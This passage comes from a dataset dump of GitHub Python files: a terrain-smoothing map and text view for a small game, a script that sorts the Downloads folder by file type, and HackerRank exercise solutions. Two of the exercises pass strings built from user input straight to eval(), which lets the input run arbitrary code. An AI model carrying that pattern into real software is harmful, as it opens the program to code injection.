MAX_SLOPE)\n\n topo_model_pass1[x][y] = (altitude, east_slope, south_slope)\n\n print(\"Pass 2: averaging out using neighbouring points...\")\n\n # Perform second pass averaging based on adjacent altitudes to smooth out topography\n # Define which neighboring points we are going to look at\n vectors = ((1, 0), (-1, 0), (0, 1), (0, -1), (1, 1), (-1, -1), (1, -1), (-1, 1))\n\n # Iterate through each point in the map\n for y in range(0, self._height):\n for x in range(0, self._width):\n\n # Get the height of the current point\n local_altitude_total, es, ss = topo_model_pass1[x][y]\n local_altitude_points = 1\n\n # Get the heights of the surrounding points\n for dx, dy in vectors:\n if x + dx < 0 or x + dx >= self._width or y + dy < 0 or y + dy >= self._height:\n pass\n else:\n local_altitude, es, ss = topo_model_pass1[x + dx][y + dy]\n local_altitude_total += local_altitude\n local_altitude_points += 1\n\n 
average_altitude = (local_altitude_total / local_altitude_points)\n\n # Record the average altitude in a new array\n self.topo_model_pass2[x][y] = average_altitude\n\n # Perform 3rd pass clipping to create floors in the topology\n a = numpy.array(self.topo_model_pass2)\n avg = numpy.mean(a)\n std = numpy.std(a)\n threshold = avg - (std * MIN_ALTITUDE_CLIP_FACTOR)\n a[a < threshold] = threshold\n self.topo_model_pass2 = a.tolist()\n\n print(\"Pass 3: applying altitude floor of {0:.3}...\".format(threshold))\n\n @property\n def width(self):\n return len(self.map)\n\n @property\n def height(self):\n return len(self.map[0])\n\n # Are the specified coordinates within the area of the map?\n def is_valid_xy(self, x: int, y: int):\n\n result = False\n\n if x >= 0 and x < self.width and y >= 0 and y < self.height:\n result = True\n\n return result\n\n # Get a map square at the specified co-ordinates\n def get(self, x: int, y: int):\n\n if self.is_valid_xy(x, y) is False:\n raise Exception(\"Trying to get tile at ({0},{1}) which is outside of the world!\".format(x, y))\n\n return self.map[x][y]\n\n def get_range(self, x: int, y: int, width: int, height: int):\n\n a = numpy.array(self.topo_model_pass2, order=\"F\")\n b = a[x:x + width, y:y + height]\n\n return b.tolist()\n\n # Set a map square at the specified co-ordinates with the specified object\n def set(self, x: int, y: int, c):\n\n if self.is_valid_xy(x, y) is False:\n raise Exception(\"Trying to set tile at ({0},{1}) which is outside of the world!\".format(x, y))\n\n self.map[x][y] = c\n\n def get_altitude(self, x: int, y: int):\n return self.topo_model_pass2[x][y]\n\n # Add objects to random tiles\n def add_objects(self, object_type, count: int = 20):\n\n for i in range(0, count):\n x = random.randint(0, self.width - 1)\n y = random.randint(0, self.height - 1)\n if self.get(x, y) is None:\n self.set(x, y, object_type)\n\n\nclass MapSquare:\n\n def __init__(self, content: str, altitude: float = 0.0):\n self.content = 
content\n self.altitude = altitude\n" }, { "alpha_fraction": 0.5834343433380127, "alphanum_fraction": 0.5878787636756897, "avg_line_length": 25.340425491333008, "blob_id": "a5c896ba47dcf46782db277ef092beca5a3a31b0", "content_id": "67a731cfb2fe9c3b7d1da50260f6445a729489a4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2475, "license_type": "no_license", "max_line_length": 109, "num_lines": 94, "path": "/kingdom2/model/model.py", "repo_name": "kwoolter/Kingdom2", "src_encoding": "UTF-8", "text": "import logging\nimport os\nfrom .utils import Event\nfrom .utils import EventQueue\nfrom .building_blocks import Resource\nfrom .building_blocks import Inventory\nfrom .building_blocks import Creatable\nfrom .building_blocks import ResourceFactory\nfrom .building_blocks import CreatableFactoryXML\nfrom .building_blocks import WorldMap\n\nclass Game:\n\n # States\n STATE_LOADED = \"loaded\"\n STATE_PLAYING = \"playing\"\n STATE_GAME_OVER = \"game over\"\n\n # Events\n EVENT_TICK = \"tick\"\n EVENT_STATE = \"state\"\n\n GAME_DATA_DIR = os.path.dirname(__file__) + \"\\\\data\\\\\"\n\n def __init__(self, name : str):\n\n self.name = name\n self.events = EventQueue()\n self._state = Game.STATE_LOADED\n self._tick_count = 0\n self.inventory = None\n self.resources = None\n self.creatables = None\n self.creations = None\n self.map = None\n\n\n @property\n def state(self):\n return self._state\n\n @state.setter\n def state(self, new_state):\n self._old_state = self.state\n self._state = new_state\n\n self.events.add_event(Event(self._state,\n \"Game state change from {0} to {1}\".format(self._old_state, self._state),\n Game.EVENT_STATE))\n\n def __str__(self):\n return self.name\n\n def start(self):\n\n self.state = Game.STATE_PLAYING\n\n self.inventory = Inventory()\n self.resources = ResourceFactory(Game.GAME_DATA_DIR + \"resources.csv\")\n self.resources.load()\n\n self.creatables = 
CreatableFactoryXML(Game.GAME_DATA_DIR + \"creatables.xml\")\n self.creatables.load()\n\n self.map = WorldMap(\"Kingdom 2\", 50, 50)\n self.map.initialise()\n\n self.creations = []\n\n def add_creation(self, new_creation : Creatable):\n self.creations.append(new_creation)\n\n def tick(self):\n self._tick_count += 1\n\n self.events.add_event(Event(Game.EVENT_TICK,\n \"Game ticked to {0}\".format(self._tick_count),\n Game.EVENT_TICK))\n\n for creation in self.creations:\n if self.inventory.is_creatable(creation):\n creation.tick()\n\n def do_game_over(self):\n\n self.state = Game.STATE_GAME_OVER\n\n def get_next_event(self):\n\n next_event = None\n if self.events.size() > 0:\n next_event = self.events.pop_event()\n\n return next_event" }, { "alpha_fraction": 0.5582748055458069, "alphanum_fraction": 0.5628786087036133, "avg_line_length": 26.151315689086914, "blob_id": "e9341d4c42a5bc2420e29c77935cd8c71c68db2f", "content_id": "025d414af718236da0a01ed95b0e3e61a2ad9d9d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4127, "license_type": "no_license", "max_line_length": 105, "num_lines": 152, "path": "/kingdom2/view/text_view.py", "repo_name": "kwoolter/Kingdom2", "src_encoding": "UTF-8", "text": "import logging\nimport sys\n\nimport colorama\n\nimport kingdom2.model as model\n\n\nclass View():\n\n def __init__(self):\n self.tick_count = 0\n\n def initialise(self):\n pass\n\n def tick(self):\n self.tick_count += 1\n\n def process_event(self, new_event: model.Event):\n logging.info(\"Default View Class event process:{0}\".format(new_event))\n\n def draw(self):\n pass\n\n\nclass TextView(View):\n\n def __init__(self, model: model.Game):\n super(TextView, self).__init__()\n\n self.model = model\n\n def draw(self):\n print(\"Text View of {0}\".format(self.model))\n\n inv_view = InventoryTextView(self.model.inventory)\n inv_view.draw()\n\n creations_view = CreationsTextView(self.model.creations)\n 
creations_view.draw()\n\n\nclass InventoryTextView(View):\n\n def __init__(self, model: model.Inventory):\n\n super(InventoryTextView, self).__init__()\n\n self.model = model\n\n def draw(self):\n if self.model is not None:\n self.model.print()\n else:\n print(\"No inventory to print!\")\n\n\nclass CreationsTextView(View):\n\n def __init__(self, model: list):\n\n super(CreationsTextView, self).__init__()\n\n self.model = model\n\n def draw(self):\n if self.model is not None:\n print(\"{0} creations:\".format(len(self.model)))\n for creation in self.model:\n print(str(creation))\n\n else:\n print(\"No creations to print!\")\n\n\nclass WorldMapTextView(View):\n COLOURS_DEFAULT = colorama.Fore.RESET + colorama.Back.RESET\n COLOURS_TITLE = colorama.Fore.BLACK + colorama.Back.YELLOW\n COLOURS_EMPTY_TILE = colorama.Fore.GREEN + colorama.Back.GREEN\n COLOURS_NON_EMPTY_TILE = colorama.Fore.BLACK + colorama.Back.GREEN\n\n def __init__(self, model: model.WorldMap):\n\n self.model = model\n\n if sys.stdout.isatty() is False:\n colorama.init(convert=False, strip=False)\n else:\n colorama.init(convert=True)\n\n def draw(self, rect: list = None):\n\n if rect is not None:\n ox, oy, width, height = rect\n else:\n ox = 0\n oy = 0\n width = self.model.width\n height = self.model.height\n\n print(WorldMapTextView.COLOURS_TITLE, end=\"\")\n print(\"+\" + \"-\" * width + \"+\" + WorldMapTextView.COLOURS_DEFAULT)\n title = \"{0:^\" + str(width) + \"}\"\n print(WorldMapTextView.COLOURS_TITLE, end=\"\")\n print(\"|\" + title.format(self.model.name) + \"|\" + WorldMapTextView.COLOURS_DEFAULT)\n print(WorldMapTextView.COLOURS_TITLE, end=\"\")\n print(\"+\" + \"-\" * width + \"+\" + WorldMapTextView.COLOURS_DEFAULT)\n\n for y in range(oy, oy + height):\n print(WorldMapTextView.COLOURS_TITLE + \"|\" + WorldMapTextView.COLOURS_DEFAULT, end=\"\")\n row = \"\"\n for x in range(ox, ox + width):\n c = self.model.get(x, y)\n if c is not None:\n row += WorldMapTextView.COLOURS_NON_EMPTY_TILE + c + 
WorldMapTextView.COLOURS_DEFAULT\n else:\n row += WorldMapTextView.COLOURS_EMPTY_TILE + \" \" + WorldMapTextView.COLOURS_DEFAULT\n\n print(row + WorldMapTextView.COLOURS_TITLE + \"|\" + WorldMapTextView.COLOURS_DEFAULT)\n\n print(WorldMapTextView.COLOURS_TITLE, end=\"\")\n print(\"+\" + \"-\" * width + \"+\" + WorldMapTextView.COLOURS_DEFAULT)\n\n\nclass WorldTopoModelTextView(View):\n\n def __init__(self, model: model.WorldMap):\n\n self.model = model\n\n def draw(self, rect: list = None):\n\n if rect is not None:\n ox, oy, width, height = rect\n else:\n ox = 0\n oy = 0\n width = self.model.width\n height = self.model.height\n\n for x in range(0, width):\n print(\",{0}\".format(x), end=\"\")\n print(\"\")\n\n for y in range(0, height):\n row = \"{0},\".format(y)\n for x in range(0, width):\n a = self.model.topo_model_pass2[x][y]\n row += \"{0:.4},\".format(a)\n\n print(row)\n" }, { "alpha_fraction": 0.8161764740943909, "alphanum_fraction": 0.8161764740943909, "avg_line_length": 26.200000762939453, "blob_id": "485a22dfb4f4cbf3d1353a1d423be66cd1273312", "content_id": "23dd49d4cae6bc8490ce96a9ec4cab3387a64223", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 136, "license_type": "no_license", "max_line_length": 29, "num_lines": 5, "path": "/kingdom2/model/__init__.py", "repo_name": "kwoolter/Kingdom2", "src_encoding": "UTF-8", "text": "from .model import Game\nfrom .model import Inventory\nfrom .model import WorldMap\nfrom .utils import EventQueue\nfrom .utils import Event\n" } ]
9
JanKPeters/SortDownloads
https://github.com/JanKPeters/SortDownloads
53500fd7a5018e751c0758aa2f1d1daf4569dc2e
89caffcf96f2574c656afbbef091fa09352fa7a6
797a1bad3c5772258291aa883a0dfd21e3ca4f0b
refs/heads/master
2020-09-25T05:25:00.412848
2019-12-04T20:54:24
2019-12-04T20:54:24
225,927,356
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.8376068472862244, "alphanum_fraction": 0.8376068472862244, "avg_line_length": 57.5, "blob_id": "d364662cb2af361e9d96108e10923b9ba23cb272", "content_id": "a9fb0a27237754a86c869136b2d2b3fdad42d723", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 117, "license_type": "no_license", "max_line_length": 100, "num_lines": 2, "path": "/README.md", "repo_name": "JanKPeters/SortDownloads", "src_encoding": "UTF-8", "text": "# SortDownloads\nA small script that periodically sorts the downloaded files into folders according to the file types\n" }, { "alpha_fraction": 0.599526047706604, "alphanum_fraction": 0.6026856303215027, "avg_line_length": 22.0181827545166, "blob_id": "95aeaa9821e665e2f664bae6a1c32825138bf529", "content_id": "2767b9b7c5adca0f217fd825fcca9c41a229f372", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1266, "license_type": "no_license", "max_line_length": 61, "num_lines": 55, "path": "/downloads.py", "repo_name": "JanKPeters/SortDownloads", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\nimport os\nimport time\nimport schedule\nimport importlib.util\n\n\npackage_recs = 'schedule'\n\nspec = importlib.util.find_spec(package_recs)\nif spec is None:\n print(package_recs +\" is not installed\")\n exit\n\ndownload = os.path.join(os.path.expanduser('~'), 'Downloads')\n\ndef check_folder(download, filetype):\n _path = os.path.join(download, filetype)\n if not os.path.exists(_path):\n os.makedirs(_path)\n\n\ndef move_files(download, filetype):\n _path = os.path.join(download, filetype)\n _files = os.listdir(download)\n for f in _files:\n if f.endswith('.' + filetype):\n f_path_ori = os.path.join(download, f)\n f_path_tar = os.path.join(_path, f)\n os.rename(f_path_ori, f_path_tar)\n\n\ndef check_for_downloads():\n filetypes = []\n\n for f in os.listdir(download):\n if f.startswith('.'):\n pass\n elif '.' 
in f:\n if f.split('.')[1] in filetypes:\n pass\n else:\n filetypes.append(f.split('.')[1])\n\n\n for filetype in filetypes:\n check_folder(download, filetype)\n move_files(download, filetype)\n\nschedule.every().hour.do(check_for_downloads)\n\nwhile True:\n schedule.run_pending()\n time.sleep(1)\n" } ]
2
kiranmaipuli/2PL-CONCURRENY-CONTROL--WAIT-DIE
https://github.com/kiranmaipuli/2PL-CONCURRENY-CONTROL--WAIT-DIE
7b3b15c0c78662843d5aa4b50289611fbdf5aa0a
a69834ef3e6a0a792e3a6d42a43e1c5c46d2a391
a707985a60b6ced42ab1b7d6d19eb3f70723ff09
refs/heads/main
2023-02-01T21:18:40.844933
2020-12-22T07:24:20
2020-12-22T07:24:20
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5347042083740234, "alphanum_fraction": 0.5371538996696472, "avg_line_length": 43.1606559753418, "blob_id": "eb789371fd6f5961c8bb08c7a892f229b5b0b27a", "content_id": "03d5e866a252414cf72a1d5b88cb75e7ea4f0fa7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13471, "license_type": "no_license", "max_line_length": 145, "num_lines": 305, "path": "/2PLConcurrencyControl_wait_die.py", "repo_name": "kiranmaipuli/2PL-CONCURRENY-CONTROL--WAIT-DIE", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport sys\n\ntimeStampCounter = 0\ncolumnNames = [\"TID\", \"timeStamp\", \"state\",\"blockedBy\",\"blockedOperations\"]\ntransactionTable = pd.DataFrame(columns = columnNames) #creating the schema for transaction table\ntransactionTable.set_index('TID',inplace = True) #using transaction_id as the index of the transaction table\ncolumnNames = [\"dataItem\", \"lockMode\", \"TIDList\",\"blockedTIDS\"]\nlockTable = pd.DataFrame(columns = columnNames) #creating the schema for lock table\nlockTable.set_index('dataItem',inplace = True) #using dataItem as the index of the lock table\n\n#input operation processing\ndef inputOperations(inputLine):\n print(\"*******************BEGIN*******************\")\n# print(\"\\n\")\n print(\"operation : \"+inputLine)\n inputLine = inputLine.replace(\" \",\"\") \n operation = inputLine[0]\n transactionNo = inputLine[1]\n if len(inputLine) > 3:\n DataItem = inputLine[3]\n global timeStampCounter\n if operation == 'b':\n timeStampCounter += 1\n begin(transactionNo)\n if operation == 'r':\n read(transactionNo,DataItem) \n if operation == 'w':\n write(transactionNo,DataItem)\n if operation == 'e':\n end(inputLine[1])\n\n#begin operation \ndef begin(i):\n transaction = 'T'+i\n print(\"Begin transaction : \"+transaction)\n transactionTable.loc[transaction] = [timeStampCounter, 'Active',[],[]]\n print(\"\\n\")\n print(\" Transaction Table \")\n print(transactionTable)\n 
print(\"\\n\")\n print(\" Lock Table \")\n print(lockTable)\n\n#read operation\ndef read(i,X):\n transaction = 'T'+i\n if transactionTable.loc[transaction]['state'] == 'Active':\n readLock(i,X)\n elif transactionTable.loc[transaction]['state'] == 'Blocked':\n inputLine = 'r'+i+'('+X+');'\n transactionTable.loc[transaction]['blockedOperations'].append(inputLine)\n print(\"operation is appended to the BlockedOperations of the transaction \"+transaction)\n print(\"\\n\")\n print(\" Transaction Table \")\n print(transactionTable)\n print(\"\\n\")\n print(\" Lock Table \")\n print(lockTable)\n elif transactionTable.loc[transaction]['state'] == 'Aborted':\n print(transaction+' already aborted')\n\ndef readLock(i,X):\n transaction = 'T'+i\n if X not in lockTable.index:\n #inserting the data item into the lock table\n lockTable.loc[X] = ['R', [transaction],[]]\n print(\"Item \"+X+\" read locked by \"+transaction)\n print(\"\\n\")\n print(\" Transaction Table \")\n print(transactionTable)\n print(\"\\n\")\n print(\" Lock Table \")\n print(lockTable)\n else:\n if lockTable.loc[X]['lockMode'] == 'R':\n #sharing of read lock with other transactions\n if transaction not in lockTable.loc[X]['TIDList']:\n print(\"inside this 3\")\n lockTable.loc[X]['TIDList'].append(transaction)\n print(\"Item \"+X+\" read locked by \"+transaction)\n print(\"\\n\")\n print(\" Transaction Table \")\n print(transactionTable)\n print(\"\\n\")\n print(\" Lock Table \")\n print(lockTable)\n else:\n print(\"read lock already exists on \"+X+\"by \"+transaction)\n else:\n # if there is a write lock on the data item by the current transaction\n#changes made here \n if (len(lockTable.loc[X]['TIDList']) == 0):\n lockTable.loc[X]['lockMode'] = 'R'\n lockTable.loc[X]['TIDList'].append(transaction)\n print(\"Item \"+X+\" read locked by \"+transaction)\n print(\"\\n\")\n print(\" Transaction Table \")\n print(transactionTable)\n print(\"\\n\")\n print(\" Lock Table \")\n print(lockTable)\n \n elif 
lockTable.loc[X]['TIDList'][0] == transaction :\n # downgrading of the write lock of the current transaction\n lockTable.loc[X]['lockMode'] = 'R'\n print(\"lock mode is downgraded for the data item \"+X)\n print(\"\\n\")\n print(\" Transaction Table \")\n print(transactionTable)\n print(\"\\n\")\n print(\" Lock Table \")\n print(lockTable)\n else:\n # read-write conflict\n deadLock(i,X,'r')\n \n#write operation\ndef write(i,X):\n transaction = 'T'+i\n if transactionTable.loc[transaction]['state'] == 'Active':\n writeLock(i,X)\n elif transactionTable.loc[transaction]['state'] == 'Blocked':\n inputLine = 'w'+i+'('+X+');'\n transactionTable.loc[transaction]['blockedOperations'].append(inputLine)\n print(\"operation is appended to the BlockedOperations of the transaction \"+transaction)\n print(\"\\n\")\n print(\" Transaction Table \")\n print(transactionTable)\n print(\"\\n\")\n print(\" Lock Table \")\n print(lockTable)\n elif transactionTable.loc[transaction]['state'] == 'Aborted':\n print(transaction+' already aborted')\n \n\ndef writeLock(i,X):\n transaction = 'T'+i\n # if the data item does not exist in the lock table\n if X not in lockTable.index:\n #insert the data item into the table with write lock\n lockTable.loc[X] = ['W', [transaction],[]]\n print(\"Item \"+X+\" write locked by \"+transaction)\n print(\"\\n\")\n print(\" Transaction Table \")\n print(transactionTable)\n print(\"\\n\")\n print(\" Lock Table \")\n print(lockTable)\n# print(X+\" write locked by \"+transaction+\": Lock table record for \"+X+\" is created with mode W (\"+transaction+\" holds lock)\")\n else:\n # upgrading of read lock of the current transaction on the data item\n if (lockTable.loc[X]['lockMode'] == 'R') and (len(lockTable.loc[X]['TIDList']) == 1) and (lockTable.loc[X]['TIDList'][0] == transaction):\n lockTable.loc[X]['lockMode'] = 'W'\n print(\"lock mode is upgraded for the data item \"+X)\n print(\"\\n\")\n print(\" Transaction Table \")\n print(transactionTable)\n 
print(\"\\n\")\n print(\" Lock Table \")\n print(lockTable)\n else:\n #read-write conflict\n deadLock(i,X,'w')\n \ndef deadLock(i,X,mode):\n print(\"deadlock is encountered\")\n transaction = 'T'+i\n for j in lockTable.loc[X]['TIDList']:\n if transactionTable.loc[transaction]['timeStamp'] > transactionTable.loc[j]['timeStamp']:\n abort(i)\n elif transactionTable.loc[transaction]['timeStamp'] < transactionTable.loc[j]['timeStamp']:\n if transaction not in lockTable.loc[X]['blockedTIDS']:\n lockTable.loc[X]['blockedTIDS'].append(transaction)\n transactionTable.loc[transaction]['state'] = 'Blocked'\n inputLine = mode+i+'('+X+');'\n transactionTable.loc[transaction]['blockedOperations'].append(inputLine) \n if j not in transactionTable.loc[transaction]['blockedBy']:\n transactionTable.loc[transaction]['blockedBy'].append(j)\n unblock()\n if X in lockTable.index:\n if len(lockTable.loc[X]['blockedTIDS']) == 0 and len(lockTable.loc[X]['TIDList']) == 1 and lockTable.loc[X]['TIDList'][0] == transaction:\n if mode == 'r':\n lockTable.loc[X]['lockMode'] = 'R'\n else:\n lockTable.loc[X]['lockMode'] = 'W'\n print(\"\\n\")\n print(\" Transaction Table \")\n print(transactionTable)\n print(\"\\n\")\n print(\" Lock Table \")\n print(lockTable)\n \n# aborting transaction Ti\ndef abort(i):\n #updating transaction table\n transaction = 'T'+i\n transactionTable.loc[transaction]['state'] = 'Aborted'\n transactionTable.loc[transaction]['blockedBy'] = []\n transactionTable.loc[transaction]['blockedOperations'] = []\n print(transaction+\" is aborted\")\n unLock(i) \n\ndef unLock(i):\n transaction = 'T'+i\n for j in transactionTable.index:\n if transaction in transactionTable.loc[j]['blockedBy']:\n transactionTable.loc[j]['blockedBy'].remove(transaction)\n\n # unlocking the data items locked by Ti \n for dataValue in lockTable.index:\n # removing Ti from TIDList\n temp = []\n if transaction in lockTable.loc[dataValue]['TIDList']:\n temp.append(transaction)\n for transactions in temp: \n 
lockTable.loc[dataValue]['TIDList'].remove(transactions)\n\n # removing Ti from blockedTIDS\n temp = []\n if transaction in lockTable.loc[dataValue]['blockedTIDS']:\n temp.append(transaction)\n for transaction in temp:\n lockTable.loc[dataValue]['blockedTIDS'].remove(transaction) \n\n # removing data items from the lock table that are completely free \n for dataValue in lockTable.index:\n if len(lockTable.loc[dataValue]['TIDList']) == 0 and len(lockTable.loc[dataValue]['blockedTIDS']) == 0: \n lockTable.drop([dataValue],axis=0, inplace=True)\n \n\n\ndef unblock():\n for dataValue in lockTable.index:\n blockList = lockTable.loc[dataValue]['blockedTIDS'][:]\n tidList = lockTable.loc[dataValue]['TIDList']\n # unblock the blocked transactions\n\n if len(blockList) != 0:\n #if (len(tidList) == 0) or (len(tidList) == 1 and (tidList[0] == blockList[0])):\n \n for transactions in blockList:\n if transactionTable.loc[transactions]['state'] == 'Blocked':\n # if the transaction is not blocked by any one \n if len(transactionTable.loc[transactions]['blockedBy']) == 0:\n #changes made here \n if len(lockTable.loc[dataValue]['blockedTIDS']) == 1 and (len(lockTable.loc[dataValue]['TIDList']) == 0):\n lockTable.drop([dataValue],axis=0, inplace=True)\n else: \n lockTable.loc[dataValue]['blockedTIDS'].remove(transactions)\n transactionTable.loc[transactions]['state'] = 'Active'\n # execute the blocked operations\n size = len(transactionTable.loc[transactions]['blockedOperations'])\n for k in range(0,size):\n if transactionTable.loc[transactions]['state'] == 'Active':\n if len(transactionTable.loc[transactions]['blockedOperations']) >= 1:\n a = transactionTable.loc[transactions]['blockedOperations'][0]\n del transactionTable.loc[transactions]['blockedOperations'][0]\n inputOperations(a)\n \n#end operation\ndef end(i):\n transaction = 'T'+i\n if transactionTable.loc[transaction]['state'] == \"Active\":\n transactionTable.loc[transaction]['state'] = 'Committed'\n 
transactionTable.loc[transaction]['blockedOperations'] = []\n print(\"transaction \"+transaction+\" is committed\")\n unLock(i)\n unblock()\n print(\"\\n\") \n print(\"operation e\"+i)\n print(\"\\n\")\n print(\" Transaction Table \")\n print(transactionTable)\n print(\"\\n\")\n print(\" Lock Table \")\n print(lockTable)\n elif transactionTable.loc[transaction]['state'] == 'Blocked':\n inputLine = 'e'+i+';'\n transactionTable.loc[transaction]['blockedOperations'].append(inputLine)\n print(\"input operation is added to the BlockedOperations list of transaction\")\n print(\"\\n\")\n print(\" Transaction Table \")\n print(transactionTable)\n print(\"\\n\")\n print(\" Lock Table \")\n print(lockTable)\n elif transactionTable.loc[transaction]['state'] == 'Aborted':\n print(transaction+' is already aborted') \n\n#input file is the name of the input file. File name is passed as a command line argument while executing the input\n#inputFile = sys.argv[1] \n\n#reading input from the file\ninputFile = sys.argv[1] \n\n#reading input from the file\nwith open(inputFile) as openfileobject:\n lines = openfileobject.readlines()\n for line in lines:\n if line != '\\n':\n inputLine = line.rstrip() \n inputOperations(inputLine) \n print(\"*******************END*******************\")\n print(\"\\n\")\n\n\n" } ]
1
shaan2348/hacker_rank
https://github.com/shaan2348/hacker_rank
09562b352df545e2365c0c654ee19d5d3da952a1
4d1ae8231cf056385f2ee802725983469ab71bb9
3f71bfcb784689ddaf0cbd8cc7e595e3655283f6
refs/heads/master
2020-03-25T11:39:33.115976
2018-09-25T08:49:21
2018-09-25T08:49:21
143,741,851
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7138047218322754, "alphanum_fraction": 0.7138047218322754, "avg_line_length": 32.11111068725586, "blob_id": "3f20a0d4af6f64d76cd4c4f9fe0a838f6a4b4693", "content_id": "2e730b9b7e7d532a926517884055f87013be8c89", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 297, "license_type": "no_license", "max_line_length": 68, "num_lines": 9, "path": "/itertools_product.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "# we have to print the cartesian product of two sets\n# using product function from itertools module\n# \"*\" infront of any thing in print unpacks the list or tuple or set\nfrom itertools import product\n\na = [int(x) for x in input().split()]\nb = [int(x) for x in input().split()]\n\nprint(*product(a,b))" }, { "alpha_fraction": 0.5152838230133057, "alphanum_fraction": 0.5414847135543823, "avg_line_length": 29.53333282470703, "blob_id": "340c29af4d9a587723758b59b62edf6176647e2d", "content_id": "58257e64382ce9fff1b170e8b39dcc2cfaddba5f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 458, "license_type": "no_license", "max_line_length": 104, "num_lines": 15, "path": "/lists.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "n = int(input()) # this is for the number of inputs to be taken\nl = []\n\nfor _ in range(n):\n cmd = input(\"Please Enter Your Command here:\")\n s = cmd.split() #splitting the command ex: if cmd is insert 1 2, so it becomes ['insert', '1' ,'2']\n\n cmd2 = s[0]\n arg = s[1:]\n\n if cmd2 != \"print\":\n cmd2 += \"(\" + \",\".join(arg) + \")\" # here we rejoin the command and it becomes insert(1 2)\n eval(\"l.\" + cmd2)\n else:\n print(l)\n" }, { "alpha_fraction": 0.6255319118499756, "alphanum_fraction": 0.6340425610542297, "avg_line_length": 20.454545974731445, "blob_id": "7b777904f4d62258da0caefe32218a3ddd16dc99", "content_id": 
"cbea3e89d98d415fda9b74d467f4e12b227be828", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 235, "license_type": "no_license", "max_line_length": 52, "num_lines": 11, "path": "/iterators_iterables.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "# for problem statement refer to the hackerrank site\nfrom itertools import *\nn = int(input())\nl = input().split()\nk = int(input())\ncount = 0\na = list(combinations(l,k))\nfor i in a:\n if 'a' in i:\n count+= 1\nprint(count/len(a))" }, { "alpha_fraction": 0.5722891688346863, "alphanum_fraction": 0.5722891688346863, "avg_line_length": 21.200000762939453, "blob_id": "abfa46eedae919426437d00e971d2f187654b98e", "content_id": "b2e45d7a08df4034439ef1de4b5f96c610eff27a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 332, "license_type": "no_license", "max_line_length": 62, "num_lines": 15, "path": "/capitalize.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "def capitalize(string):\n a = []\n s = string.split()\n for i in s:\n a.append(i.capitalize())\n return (\" \".join(a))\n\nif __name__ == '__main__':\n string = input()\n capitalized_string = capitalize(string)\n print(capitalized_string)\n\n\n# one liner:\n# return (' '.join(i.capitalize() for i in string.split(' ')))" }, { "alpha_fraction": 0.6086956262588501, "alphanum_fraction": 0.6284584999084473, "avg_line_length": 17.740739822387695, "blob_id": "a9c5a15a4374363a10f665fd12435e731ce9ca1a", "content_id": "cee32644c6be5347dd9be49d66b23533d1d63426", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 506, "license_type": "no_license", "max_line_length": 124, "num_lines": 27, "path": "/percentage.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "n = int(input())\n\nmarksheet = {}\n\nfor _ in range(n):\n details = 
input().split()\n name = details[0]\n marks = details[1:]\n marksheet[name] = marks\n\n #marksheet[name] = [marks1, marks2, marks3] this is also a way to allocate multiple values to a single key in dictionary\n\n#print(marksheet)\n\nx = input()\n\nl = marksheet[x]\na = len(l)\nsum = 0\navg = 0\n\nfor i in range(a):\n sum = sum + float(l[i])\n\navg = sum/a\n\nprint(f'{avg:.2f}') #applies only for py 3.6 or above otherwise use .format method\n" }, { "alpha_fraction": 0.4861878454685211, "alphanum_fraction": 0.4917127192020416, "avg_line_length": 19.22222137451172, "blob_id": "ce30cedcbf37c98c58ce803dd183e61cadbc6a6f", "content_id": "f0c9fdbe95012ed78c887ccc6988c865ed509c36", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 181, "license_type": "no_license", "max_line_length": 30, "num_lines": 9, "path": "/set_mutations.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "N = int(input())\nA = set(input().split())\n\nM = int(input())\nfor i in range(M):\n x = input().split()\n y = input().split()\n eval('A.' 
+ x[0] + '(y)' )\nprint(sum(map(int, A)))" }, { "alpha_fraction": 0.5882353186607361, "alphanum_fraction": 0.5882353186607361, "avg_line_length": 29.600000381469727, "blob_id": "c24ca0c4c6959180bedf41dd268a5ed2c89f2a7c", "content_id": "1082be7a68b10b9f727f497638e825c31af6e4a7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 153, "license_type": "no_license", "max_line_length": 48, "num_lines": 5, "path": "/math_power_modpower.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "# we have to print pow(a,b) and\n# pow(a,b,m) it calculates (a**b) % m\na,b,m = int(input()), int(input()), int(input())\nprint(pow(a,b))\nprint(pow(a,b,m))\n" }, { "alpha_fraction": 0.6877076625823975, "alphanum_fraction": 0.7043189406394958, "avg_line_length": 25.173913955688477, "blob_id": "1b0d37f4b14dd0d37538161a87a67cddf6836bb9", "content_id": "f57d1701e34be39325d95f0748ba7730cbf3d323", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 602, "license_type": "no_license", "max_line_length": 60, "num_lines": 23, "path": "/set_union.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "# we take input for n number of students who have subscribed\n# for english newspaper and take input for their roll nos\nn = int(input())\ns1 = set(map(int, input().split()))\n\n# we take input for b number of students who have 